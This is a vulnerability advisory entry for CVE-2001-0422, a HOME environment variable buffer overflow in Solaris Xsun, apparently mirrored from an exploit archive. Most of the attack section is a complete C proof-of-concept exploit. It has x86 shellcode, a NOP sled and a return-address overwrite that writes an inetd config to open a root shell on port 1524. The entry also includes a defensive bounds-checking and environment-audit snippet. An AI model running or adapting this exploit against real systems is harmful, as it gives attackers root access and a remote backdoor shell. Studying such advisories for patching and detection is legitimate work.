Solaris Xsun Buffer Overflow Vulnerability


Vulnerability ID: 1106288
Vulnerability type: Buffer overflow
Published: 2001-04-10
Updated: 2005-05-02
CVE ID: CVE-2001-0422
CNNVD ID: CNNVD-200107-007
Platform: Solaris
CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/20743
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-007
|Details
Xsun in Solaris 8 and earlier versions contains a buffer overflow vulnerability. A local user can execute arbitrary commands by means of an overly long HOME environment variable.
|Exploit
source: http://www.securityfocus.com/bid/2561/info

The X11 server that ships with Sun Microsystems' Solaris, Xsun, contains a locally exploitable buffer overflow vulnerability.

The condition is present when the value of the HOME environment variable is of excessive length (more than 1050 bytes long).

An attacker may exploit this vulnerability to execute arbitrary code with effective group 'root' privileges. 
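The same bug class seen from the defender's side, as an added example that is not part of the advisory and not Xsun's source: a hypothetical reconstruction of the pattern (a per-user path built from HOME in a fixed-size buffer), the bounds-checked replacement that refuses over-long values, and an environment audit keyed to the 1050-byte trigger length the advisory gives. The function names, HOME_BUF and the ".Xauthority" suffix are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of the bug class, not Xsun's actual source:
 * a per-user path is built from HOME in a fixed buffer with an unbounded
 * copy, e.g. strcpy(tmp, getenv("HOME")); a value of HOME_BUF bytes or
 * more then runs off the end of tmp and onto the saved return address. */
#define HOME_BUF 1024
#define TRIGGER_LEN 1050   /* length the advisory names as the trigger */
/* Hardened form: measure before copying and refuse, rather than truncate,
 * a value that cannot fit. Returns 0 on success, -1 otherwise. */
int build_auth_path_safe(char *out, size_t outlen, const char *home)
{
    const char *suffix = "/.Xauthority";
    if (home == NULL || out == NULL || home[0] == '\0')
        return -1;
    if (strlen(home) + strlen(suffix) + 1 > outlen)
        return -1;
    snprintf(out, outlen, "%s%s", home, suffix);
    return 0;
}

/* Audit helper for a setgid program: count environment values of at least
 * `limit` bytes so the caller can refuse the environment before parsing it. */
int count_overlong_env(char *const envp[], size_t limit)
{
    int n = 0;
    for (size_t i = 0; envp[i] != NULL; i++) {
        const char *eq = strchr(envp[i], '=');
        if (strlen(eq ? eq + 1 : envp[i]) >= limit)
            n++;
    }
    return n;
}

/* Runs both checks against a constructed 1099-byte HOME value and a normal
 * one; returns the number of checks that behaved as intended (3 = all). */
int self_check(void)
{
    static char longhome[1100], entry[1106], out[HOME_BUF];
    char *env[] = { "PATH=/usr/bin", entry, NULL };
    int passed = 0;
    memset(longhome, 'A', sizeof longhome - 1);           /* constructed */
    snprintf(entry, sizeof entry, "HOME=%s", longhome);
    passed += build_auth_path_safe(out, sizeof out, "/export/home/alice") == 0
           && strcmp(out, "/export/home/alice/.Xauthority") == 0;
    passed += build_auth_path_safe(out, sizeof out, longhome) == -1;
    passed += count_overlong_env(env, TRIGGER_LEN) == 1;
    return passed;
}
```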

/***********************************/
Solaris 7 (x86) /usr/openwin/bin/Xsun
HOME environment overflow

Proof of Concept Exploitation
[email protected]

Puts a Root shell on local port 1524
/***********************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFLEN  1041

/* seteuid/setuid/inetd shell */
char eyecode[] =
"\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e"
"\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c"
"\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50"
"\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46"
"\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56"
"\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e"
"\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2"
"\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff"
"\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73"
"\x68\x20\x2d\x63\x20"
/* the inetd config file written here must be the same path given to inetd -s */
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye2001;"
"/usr/sbin/inetd -s /tmp/eeye2001";

char buf[BUFLEN + 1];          /* +1 keeps the string NUL-terminated for putenv() */
unsigned long int esp;
long int offset = 0;

/* Return the current stack pointer (x86; the value is left in %eax). */
unsigned long int get_esp(void)
{__asm__("movl %esp,%eax");}

int main (int argc, char *argv[])
{
	if (argc > 1)
		offset = strtol(argv[1], NULL, 0);      /* optional override of the guessed offset */
	else
		offset = -200;
	esp = get_esp();
	memset(buf, 0x90, BUFLEN);                  /* NOP sled */
	memcpy(buf+800, eyecode, strlen(eyecode));  /* shellcode at offset 800 */
	*((int *) &buf[1037]) = esp+offset;         /* overwrite the saved return address */
	strncpy(&buf[0],"HOME=",5);                 /* turn the buffer into a HOME= entry */
	buf[BUFLEN] = '\0';
	putenv(buf);
	execl("/usr/openwin/bin/Xsun", "eEye", ":1", NULL);
	return 1;                                   /* only reached if execl() fails */
}
|References

Source: BID
Name: 2561
Link: http://www.securityfocus.com/bid/2561
Source: BUGTRAQ
Name: 20010410 Solaris Xsun buffer overflow vulnerability
Link: http://archives.neohapsis.com/archives/bugtraq/2001-04/0158.html
Source: XF
Name: solaris-xsun-home-bo(6343)
Link: http://xforce.iss.net/static/6343.php
Source: US Government Resource: oval:org.mitre.oval:def:555
Name: oval:org.mitre.oval:def:555
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:555
